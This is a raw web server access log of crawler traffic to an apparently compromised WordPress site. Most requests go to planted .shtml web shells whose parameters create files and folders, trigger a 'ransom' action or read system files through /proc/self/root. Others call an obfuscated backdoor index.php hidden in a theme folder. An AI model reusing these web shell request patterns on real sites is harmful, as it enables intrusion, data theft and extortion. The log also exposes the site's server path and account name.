20.171.207.66 - - [15/Jun/2025:09:06:42 -0400] "GET /?filesrc=%2F%2Fproc%2Fself%2Froot%2Fusr%2Fshare%2Fman%2Fman3%2FHTTP%3A%3ATiny.3pm.gz&path=%2F%2Fproc%2Fself%2Froot%2Fusr%2Fshare%2Fman%2Fman3 HTTP/1.1" 200 10637 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
20.171.207.175 - - [15/Jun/2025:09:06:42 -0400] "GET /berating836466622.shtml?aksi=buatfile&path=%2Fhome%2Fhonehdyv%2Freadbtooom.com%2Fwp-content%2Fplugins%2Fall-404-redirect-to-homepage%2Fjs HTTP/1.1" 200 2500 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
162.0.232.193 - - [15/Jun/2025:09:05:04 -0400] "GET /wp-content/themes/twentynineteen/sass/layout/layout/index.php?ARRAY=7o2230223n313734393939363330342p2231223n22687474703n5p2s5p2s7n7331393176313379612r63616p776973652r626s6174735p2s3s6p633q7068705s636s64655s6n6326743q313734393939323730342q3961386166626665363134303735643531663061373562383632356365663033222p2232223n223234336632316336393733616437393438653632616638643836363463346466222p2233223n226638613531633563383166656138353739393038393634373032363437643264222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232382q33332q36302q36382q37332q38372q3135227q HTTP/1.1" 200 0 "-" "-"
216.73.216.154 - - [15/Jun/2025:09:06:44 -0400] "GET /dartos1092916366.shtml?path=%2Fhome%2Fhonehdyv%2Freadbtooom.com%2Fimages HTTP/1.1" 200 2563 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; [email protected])"
20.171.207.175 - - [15/Jun/2025:09:06:44 -0400] "GET /berating836466622.shtml?aksi=buatfolder&path=%2Fhome%2Fhonehdyv%2Freadbtooom.com%2Fwp-content%2Fplugins%2Fall-404-redirect-to-homepage%2Fimages HTTP/1.1" 200 2128 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
20.171.207.66 - - [15/Jun/2025:09:06:43 -0400] "GET /?filesrc=%2F%2Fproc%2Fself%2Froot%2Fusr%2Fshare%2Fman%2Fman3%2FSHA224_Update.3ssl.gz&path=%2F%2Fproc%2Fself%2Froot%2Fusr%2Fshare%2Fman%2Fman3 HTTP/1.1" 200 5075 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
20.171.207.175 - - [15/Jun/2025:09:06:45 -0400] "GET /berating836466622.shtml?aksi=buatfile&path=%2Fhome%2Fhonehdyv%2Freadbtooom.com%2Fwp-content%2Fplugins%2Fall-404-redirect-to-homepage%2Fimages HTTP/1.1" 200 2783 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
20.171.207.66 - - [15/Jun/2025:09:06:45 -0400] "GET /?filesrc=%2F%2Fproc%2Fself%2Froot%2Fusr%2Fshare%2Fman%2Fman3%2FURI%3A%3AWithBase.3pm.gz&path=%2F%2Fproc%2Fself%2Froot%2Fusr%2Fshare%2Fman%2Fman3 HTTP/1.1" 200 3846 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
20.171.207.175 - - [15/Jun/2025:09:06:46 -0400] "GET /crapulent231979810.shtml?aksi=ransom&path=%2Fhome%2Fhonehdyv%2Freadbtooom.com%2Fwp-content%2Fplugins%2Fall-404-redirect-to-homepage%2Fimages HTTP/1.1" 200 2783 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
20.171.207.66 - - [15/Jun/2025:09:06:46 -0400] "GET /?filesrc=%2F%2Fproc%2Fself%2Froot%2Fusr%2Fshare%2Fman%2Fman3%2FSSL_get1_curves.3ssl.gz&path=%2F%2Fproc%2Fself%2Froot%2Fusr%2Fshare%2Fman%2Fman3 HTTP/1.1" 200 5233 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
20.171.207.175 - - [15/Jun/2025:09:06:47 -0400] "GET /berating836466622.shtml?aksi=ransom&path=%2Fhome%2Fhonehdyv%2Freadbtooom.com%2Fwp-content%2Fplugins%2Fall-404-redirect-to-homepage%2Fjs HTTP/1.1" 200 2500 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
20.171.207.66 - - [15/Jun/2025:09:06:48 -0400] "GET /?filesrc=%2F%2Fproc%2Fself%2Froot%2Fusr%2Fshare%2Fman%2Fman3%2FI18N%3A%3ACollate.3pm.gz&path=%2F%2Fproc%2Fself%2Froot%2Fusr%2Fshare%2Fman%2Fman3 HTTP/1.1" 200 4747 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
216.73.216.154 - - [15/Jun/2025:09:06:48 -0400] "GET /combiner/1466197898.shtml?filesrc=%2Fhome%2Fhonehdyv%2Freadbtooom.com%2Freadme.html&path=%2Fhome%2Fhonehdyv%2Freadbtooom.com HTTP/1.1" 200 5034 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; [email protected])"
20.171.207.175 - - [15/Jun/2025:09:06:48 -0400] "GET /chockfull836457504.shtml?aksi=buatfolder&path=%2Fhome%2Fhonehdyv%2Freadbtooom.com%2Fwp-content%2Fplugins%2Fall-404-redirect-to-homepage HTTP/1.1" 200 2112 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
20.171.207.66 - - [15/Jun/2025:09:06:49 -0400] "GET /?filesrc=%2F%2Fproc%2Fself%2Froot%2Fusr%2Fshare%2Fman%2Fman3%2Fi2d_PublicKey.3ssl.gz&path=%2F%2Fproc%2Fself%2Froot%2Fusr%2Fshare%2Fman%2Fman3 HTTP/1.1" 200 5014 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
20.171.207.175 - - [15/Jun/2025:09:06:50 -0400] "GET /chockfull836457504.shtml?aksi=ransom&path=%2Fhome%2Fhonehdyv%2Freadbtooom.com%2Fwp-content%2Fplugins%2Fall-404-redirect-to-homepage HTTP/1.1" 200 2997 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
20.171.207.66 - - [15/Jun/2025:09:06:50 -0400] "GET /?filesrc=%2F%2Fproc%2Fself%2Froot%2Fusr%2Fshare%2Fman%2Fman3%2FHTML%3A%3ATagset.3pm.gz&path=%2F%2Fproc%2Fself%2Froot%2Fusr%2Fshare%2Fman%2Fman3 HTTP/1.1" 200 5689 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
20.171.207.175 - - [15/Jun/2025:09:06:51 -0400] "GET /chockfull836457504.shtml?aksi=buatfile&path=%2Fhome%2Fhonehdyv%2Freadbtooom.com%2Fwp-content%2Fplugins%2Fall-404-redirect-to-homepage HTTP/1.1" 200 2997 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
20.171.207.66 - - [15/Jun/2025:09:06:51 -0400] "GET /?filesrc=%2F%2Fproc%2Fself%2Froot%2Fusr%2Fshare%2Fman%2Fman3%2FRSA_get0_engine.3ssl.gz&path=%2F%2Fproc%2Fself%2Froot%2Fusr%2Fshare%2Fman%2Fman3 HTTP/1.1" 200 6140 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
54.86.59.155 - - [15/Jun/2025:09:06:51 -0400] "GET /?path=//lib64/gssproxy HTTP/1.1" 200 20459 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
20.171.207.175 - - [15/Jun/2025:09:06:52 -0400] "GET /chockfull836457504.shtml?path=%2Fhome%2Fhonehdyv%2Freadbtooom.com%2Fwp-content%2Fplugins%2Fall-404-redirect-to-homepage%2Fjs HTTP/1.1" 200 2500 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
20.171.207.66 - - [15/Jun/2025:09:06:53 -0400] "GET /?filesrc=%2F%2Fproc%2Fself%2Froot%2Fusr%2Fshare%2Fman%2Fman3%2FCMS_add0_cert.3ssl.gz&path=%2F%2Fproc%2Fself%2Froot%2Fusr%2Fshare%2Fman%2Fman3 HTTP/1.1" 200 4686 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
20.171.207.175 - - [15/Jun/2025:09:06:53 -0400] "GET /chockfull836457504.shtml?aksi=ransom&path=%2Fhome%2Fhonehdyv%2Freadbtooom.com%2Fwp-content%2Fplugins%2Fdisqus-comment-system HTTP/1.1" 200 2871 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
216.73.216.154 - - [15/Jun/2025:09:06:53 -0400] "GET /discous1410251658.shtml?path=%2Fhome%2Fhonehdyv%2Freadbtooom.com%2Fwp-content HTTP/1.1" 200 3003 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; [email protected])"
20.171.207.66 - - [15/Jun/2025:09:06:54 -0400] "GET /?filesrc=%2F%2Fproc%2Fself%2Froot%2Fusr%2Fshare%2Fman%2Fman3%2FEVP_cast5_cfb.3ssl.gz&path=%2F%2Fproc%2Fself%2Froot%2Fusr%2Fshare%2Fman%2Fman3 HTTP/1.1" 200 4430 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
20.171.207.175 - - [15/Jun/2025:09:06:54 -0400] "GET /chockfull836457504.shtml?filesrc=%2Fhome%2Fhonehdyv%2Freadbtooom.com%2Fwp-content%2Fplugins%2Fdisqus-comment-system%2Fdisqus.php&path=%2Fhome%2Fhonehdyv%2Freadbtooom.com%2Fwp-content%2Fplugins%2Fdisqus-comment-system HTTP/1.1" 200 3004 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
20.171.207.66 - - [15/Jun/2025:09:06:55 -0400] "GET /?filesrc=%2F%2Fproc%2Fself%2Froot%2Fusr%2Fshare%2Fman%2Fman3%2FBF_cfb64_encrypt.3ssl.gz&path=%2F%2Fproc%2Fself%2Froot%2Fusr%2Fshare%2Fman%2Fman3 HTTP/1.1" 200 5635 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
34.227.156.153 - - [15/Jun/2025:09:06:55 -0400] "GET /?filesrc=//bin/timeout&path=//bin HTTP/1.1" 200 37688 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
20.171.207.175 - - [15/Jun/2025:09:06:56 -0400] "GET /chockfull836457504.shtml?filesrc=%2Fhome%2Fhonehdyv%2Freadbtooom.com%2Fwp-content%2Fplugins%2Fdisqus-comment-system%2FREADME.txt&path=%2Fhome%2Fhonehdyv%2Freadbtooom.com%2Fwp-content%2Fplugins%2Fdisqus-comment-system HTTP/1.1" 200 9815 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
20.171.207.66 - - [15/Jun/2025:09:06:56 -0400] "GET /?filesrc=%2F%2Fproc%2Fself%2Froot%2Fusr%2Fshare%2Fman%2Fman3%2FOCSP_resp_get0.3ssl.gz&path=%2F%2Fproc%2Fself%2Froot%2Fusr%2Fshare%2Fman%2Fman3 HTTP/1.1" 200 6558 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
20.171.207.175 - - [15/Jun/2025:09:06:57 -0400] "GET /chockfull836457504.shtml?path=%2Fhome%2Fhonehdyv%2Freadbtooom.com%2Fwp-content%2Fplugins%2Fall-404-redirect-to-homepage%2Fimages HTTP/1.1" 200 2783 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
20.171.207.66 - - [15/Jun/2025:09:06:58 -0400] "GET /?filesrc=%2F%2Fproc%2Fself%2Froot%2Fusr%2Fshare%2Fman%2Fman3%2FPerl%3A%3AOSType.3pm.gz&path=%2F%2Fproc%2Fself%2Froot%2Fusr%2Fshare%2Fman%2Fman3 HTTP/1.1" 200 4447 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
20.171.207.175 - - [15/Jun/2025:09:06:58 -0400] "GET /chockfull836457504.shtml?filesrc=%2Fhome%2Fhonehdyv%2Freadbtooom.com%2Fwp-content%2Fplugins%2Fdisqus-comment-system%2FLICENSE.txt&path=%2Fhome%2Fhonehdyv%2Freadbtooom.com%2Fwp-content%2Fplugins%2Fdisqus-comment-system HTTP/1.1" 200 8957 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
20.171.207.66 - - [15/Jun/2025:09:06:58 -0400] "GET /?filesrc=%2F%2Fproc%2Fself%2Froot%2Fusr%2Fshare%2Fman%2Fman3%2FAuthen%3A%3ANTLM.3pm.gz&path=%2F%2Fproc%2Fself%2Froot%2Fusr%2Fshare%2Fman%2Fman3 HTTP/1.1" 200 4899 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
20.171.207.175 - - [15/Jun/2025:09:06:59 -0400] "GET /berating836466622.shtml?filesrc=%2Fhome%2Fhonehdyv%2Freadbtooom.com%2Fwp-content%2Fplugins%2Fdisqus-comment-system%2FLICENSE.txt&path=%2Fhome%2Fhonehdyv%2Freadbtooom.com%2Fwp-content%2Fplugins%2Fdisqus-comment-system HTTP/1.1" 200 8957 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
20.171.207.66 - - [15/Jun/2025:09:06:59 -0400] "GET /?filesrc=%2F%2Fproc%2Fself%2Froot%2Fusr%2Fshare%2Fman%2Fman3%2FCPAN%3A%3AAdmin.3pm.gz&path=%2F%2Fproc%2Fself%2Froot%2Fusr%2Fshare%2Fman%2Fman3 HTTP/1.1" 200 4050 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
20.171.207.175 - - [15/Jun/2025:09:07:00 -0400] "GET /crapulent231979810.shtml?filesrc=%2Fhome%2Fhonehdyv%2Freadbtooom.com%2Fwp-content%2Fplugins%2Fdisqus-comment-system%2FREADME.txt&path=%2Fhome%2Fhonehdyv%2Freadbtooom.com%2Fwp-content%2Fplugins%2Fdisqus-comment-system HTTP/1.1" 200 9815 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
3.223.134.5 - - [15/Jun/2025:09:07:00 -0400] "GET /?filesrc=//bin/setterm&path=//bin HTTP/1.1" 200 37146 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
20.171.207.66 - - [15/Jun/2025:09:07:01 -0400] "GET /?filesrc=%2F%2Fproc%2Fself%2Froot%2Fusr%2Fshare%2Fman%2Fman3%2FX509_set_version.3ssl.gz&path=%2F%2Fproc%2Fself%2Froot%2Fusr%2Fshare%2Fman%2Fman3 HTTP/1.1" 200 4708 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
20.171.207.175 - - [15/Jun/2025:09:07:01 -0400] "GET /crapulent231979810.shtml?path=%2Fhome%2Fhonehdyv%2Freadbtooom.com%2Fwp-content%2Fplugins%2Fdisqus-comment-system%2Fpublic HTTP/1.1" 200 2676 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
20.171.207.66 - - [15/Jun/2025:09:07:02 -0400] "GET /?filesrc=%2F%2Fproc%2Fself%2Froot%2Fusr%2Fshare%2Fman%2Fman3%2FEVP_aria_256_ccm.3ssl.gz&path=%2F%2Fproc%2Fself%2Froot%2Fusr%2Fshare%2Fman%2Fman3 HTTP/1.1" 200 4803 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
20.171.207.175 - - [15/Jun/2025:09:07:03 -0400] "GET /chockfull836457504.shtml?path=%2Fhome%2Fhonehdyv%2Freadbtooom.com%2Fwp-content%2Fplugins%2Fdisqus-comment-system%2Fpublic HTTP/1.1" 200 2676 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
20.171.207.66 - - [15/Jun/2025:09:07:03 -0400] "GET /?filesrc=%2F%2Fproc%2Fself%2Froot%2Fusr%2Fshare%2Fman%2Fman3%2FOBJ_get0_data.3ssl.gz&path=%2F%2Fproc%2Fself%2Froot%2Fusr%2Fshare%2Fman%2Fman3 HTTP/1.1" 200 6253 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
162.0.232.193 - - [15/Jun/2025:09:05:24 -0400] "GET /wp-content/themes/twentynineteen/sass/layout/layout/index.php?ARRAY=7o2230223n313734393939363332342p2231223n22687474703n5p2s5p2s7n7331393176313379612r63616p776973652r626s6174735p2s3s6p633q7068705s636s64655s6n6326743q313734393939323732342q3861396561383138343466663065313133363764356166623830376132303638222p2232223n223234336632316336393733616437393438653632616638643836363463346466222p2233223n226638613531633563383166656138353739393038393634373032363437643264222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232382q33332q36302q36382q37332q38372q3135227q HTTP/1.1" 200 0 "-" "-"
3.230.224.6 - - [15/Jun/2025:09:07:03 -0400] "GET /?filesrc=//bin/sum&path=//bin HTTP/1.1" 200 38263 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
20.171.207.175 - - [15/Jun/2025:09:07:04 -0400] "GET /chockfull836457504.shtml?filesrc=%2Fhome%2Fhonehdyv%2Freadbtooom.com%2Fwp-content%2Fplugins%2Fall-404-redirect-to-homepage%2Fjs%2Fcustom.js&path=%2Fhome%2Fhonehdyv%2Freadbtooom.com%2Fwp-content%2Fplugins%2Fall-404-redirect-to-homepage%2Fjs HTTP/1.1" 200 2569 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
20.171.207.66 - - [15/Jun/2025:09:07:04 -0400] "GET /?filesrc=%2F%2Fproc%2Fself%2Froot%2Fusr%2Fshare%2Fman%2Fman3%2FCMS_add1_cert.3ssl.gz&path=%2F%2Fproc%2Fself%2Froot%2Fusr%2Fshare%2Fman%2Fman3 HTTP/1.1" 200 4686 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
20.171.207.175 - - [15/Jun/2025:09:07:05 -0400] "GET /chockfull836457504.shtml?aksi=ransom&path=%2Fhome%2Fhonehdyv%2Freadbtooom.com%2Fwp-content%2Fplugins%2Fall-404-redirect-to-homepage%2Fjs HTTP/1.1" 200 2500 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
20.171.207.66 - - [15/Jun/2025:09:07:06 -0400] "GET /?filesrc=%2F%2Fproc%2Fself%2Froot%2Fusr%2Fshare%2Fman%2Fman3%2Fxcb_dri3_open_reply.3.gz&path=%2F%2Fproc%2Fself%2Froot%2Fusr%2Fshare%2Fman%2Fman3 HTTP/1.1" 200 2114 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
20.171.207.175 - - [15/Jun/2025:09:07:06 -0400] "GET /chockfull836457504.shtml?aksi=buatfile&path=%2Fhome%2Fhonehdyv%2Freadbtooom.com%2Fwp-content%2Fplugins%2Fall-404-redirect-to-homepage%2Fjs HTTP/1.1" 200 2500 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
20.171.207.66 - - [15/Jun/2025:09:07:06 -0400] "GET /?filesrc=%2F%2Fproc%2Fself%2Froot%2Fusr%2Fshare%2Fman%2Fman3%2FEVP_aria_256_ctr.3ssl.gz&path=%2F%2Fproc%2Fself%2Froot%2Fusr%2Fshare%2Fman%2Fman3 HTTP/1.1" 200 4803 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
20.171.207.175 - - [15/Jun/2025:09:07:07 -0400] "GET /chockfull836457504.shtml?aksi=buatfolder&path=%2Fhome%2Fhonehdyv%2Freadbtooom.com%2Fwp-content%2Fplugins%2Fall-404-redirect-to-homepage%2Fjs HTTP/1.1" 200 2123 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
20.171.207.66 - - [15/Jun/2025:09:07:08 -0400] "GET /?filesrc=%2F%2Fproc%2Fself%2Froot%2Fusr%2Fshare%2Fman%2Fman3%2FEVP_aria_128_ccm.3ssl.gz&path=%2F%2Fproc%2Fself%2Froot%2Fusr%2Fshare%2Fman%2Fman3 HTTP/1.1" 200 4803 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
20.171.207.175 - - [15/Jun/2025:09:07:08 -0400] "GET /chockfull836457504.shtml?filesrc=%2Fhome%2Fhonehdyv%2Freadbtooom.com%2Fwp-content%2Fplugins%2Fall-404-redirect-to-homepage%2Fimages%2Fgradient_color_bg.gif&path=%2Fhome%2Fhonehdyv%2Freadbtooom.com%2Fwp-content%2Fplugins%2Fall-404-redirect-to-homepage%2Fimages HTTP/1.1" 200 2157 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
20.171.207.66 - - [15/Jun/2025:09:07:09 -0400] "GET /?filesrc=%2F%2Fproc%2Fself%2Froot%2Fusr%2Fshare%2Fman%2Fman3%2FIO%3A%3ASeekable.3pm.gz&path=%2F%2Fproc%2Fself%2Froot%2Fusr%2Fshare%2Fman%2Fman3 HTTP/1.1" 200 4927 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
20.171.207.175 - - [15/Jun/2025:09:07:10 -0400] "GET /chockfull836457504.shtml?filesrc=%2Fhome%2Fhonehdyv%2Freadbtooom.com%2Fwp-content%2Fplugins%2Fall-404-redirect-to-homepage%2Fimages%2Fgray_bg.gif&path=%2Fhome%2Fhonehdyv%2Freadbtooom.com%2Fwp-content%2Fplugins%2Fall-404-redirect-to-homepage%2Fimages HTTP/1.1" 200 2253 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
20.171.207.66 - - [15/Jun/2025:09:07:10 -0400] "GET /?filesrc=%2F%2Fproc%2Fself%2Froot%2Fusr%2Fshare%2Fman%2Fman3%2FLWP%3A%3ADebug.3pm.gz&path=%2F%2Fproc%2Fself%2Froot%2Fusr%2Fshare%2Fman%2Fman3 HTTP/1.1" 200 3962 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
20.171.207.175 - - [15/Jun/2025:09:07:11 -0400] "GET /chockfull836457504.shtml?filesrc=%2Fhome%2Fhonehdyv%2Freadbtooom.com%2Fwp-content%2Fplugins%2Fall-404-redirect-to-homepage%2Fimages%2Fseopro.png&path=%2Fhome%2Fhonehdyv%2Freadbtooom.com%2Fwp-content%2Fplugins%2Fall-404-redirect-to-homepage%2Fimages HTTP/1.1" 200 25060 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
20.171.207.66 - - [15/Jun/2025:09:07:11 -0400] "GET /?filesrc=%2F%2Fproc%2Fself%2Froot%2Fusr%2Fshare%2Fman%2Fman3%2FEVP_aria_192_ccm.3ssl.gz&path=%2F%2Fproc%2Fself%2Froot%2Fusr%2Fshare%2Fman%2Fman3 HTTP/1.1" 200 4803 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
20.171.207.66 - - [15/Jun/2025:09:07:13 -0400] "GET /?filesrc=%2F%2Fproc%2Fself%2Froot%2Fusr%2Fshare%2Fman%2Fman3%2FDigest%3A%3AHMAC.3pm.gz&path=%2F%2Fproc%2Fself%2Froot%2Fusr%2Fshare%2Fman%2Fman3 HTTP/1.1" 200 3918 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
20.171.207.175 - - [15/Jun/2025:09:07:12 -0400] "GET /chockfull836457504.shtml?filesrc=%2Fhome%2Fhonehdyv%2Freadbtooom.com%2Fwp-content%2Fplugins%2Fall-404-redirect-to-homepage%2Fimages%2Fdialog-warning.png&path=%2Fhome%2Fhonehdyv%2Freadbtooom.com%2Fwp-content%2Fplugins%2Fall-404-redirect-to-homepage%2Fimages HTTP/1.1" 200 3455 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
20.171.207.175 - - [15/Jun/2025:09:07:14 -0400] "GET /chockfull836457504.shtml?filesrc=%2Fhome%2Fhonehdyv%2Freadbtooom.com%2Fwp-content%2Fplugins%2Fall-404-redirect-to-homepage%2Fimages%2Faction_success.png&path=%2Fhome%2Fhonehdyv%2Freadbtooom.com%2Fwp-content%2Fplugins%2Fall-404-redirect-to-homepage%2Fimages HTTP/1.1" 200 3617 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
20.171.207.66 - - [15/Jun/2025:09:07:14 -0400] "GET /?filesrc=%2F%2Fproc%2Fself%2Froot%2Fusr%2Fshare%2Fman%2Fman3%2FCPAN%3A%3ATarzip.3pm.gz&path=%2F%2Fproc%2Fself%2Froot%2Fusr%2Fshare%2Fman%2Fman3 HTTP/1.1" 200 3304 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
20.171.207.66 - - [15/Jun/2025:09:07:15 -0400] "GET /?filesrc=%2F%2Fproc%2Fself%2Froot%2Fusr%2Fshare%2Fman%2Fman3%2FRSA_get0_factors.3ssl.gz&path=%2F%2Fproc%2Fself%2Froot%2Fusr%2Fshare%2Fman%2Fman3 HTTP/1.1" 200 6134 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
20.171.207.175 - - [15/Jun/2025:09:07:15 -0400] "GET /chockfull836457504.shtml?filesrc=%2Fhome%2Fhonehdyv%2Freadbtooom.com%2Fwp-content%2Fplugins%2Fall-404-redirect-to-homepage%2Fimages%2Ferror.png&path=%2Fhome%2Fhonehdyv%2Freadbtooom.com%2Fwp-content%2Fplugins%2Fall-404-redirect-to-homepage%2Fimages HTTP/1.1" 200 3566 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
54.89.90.224 - - [15/Jun/2025:09:07:15 -0400] "GET /?path=//lib64/cmake HTTP/1.1" 200 20801 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
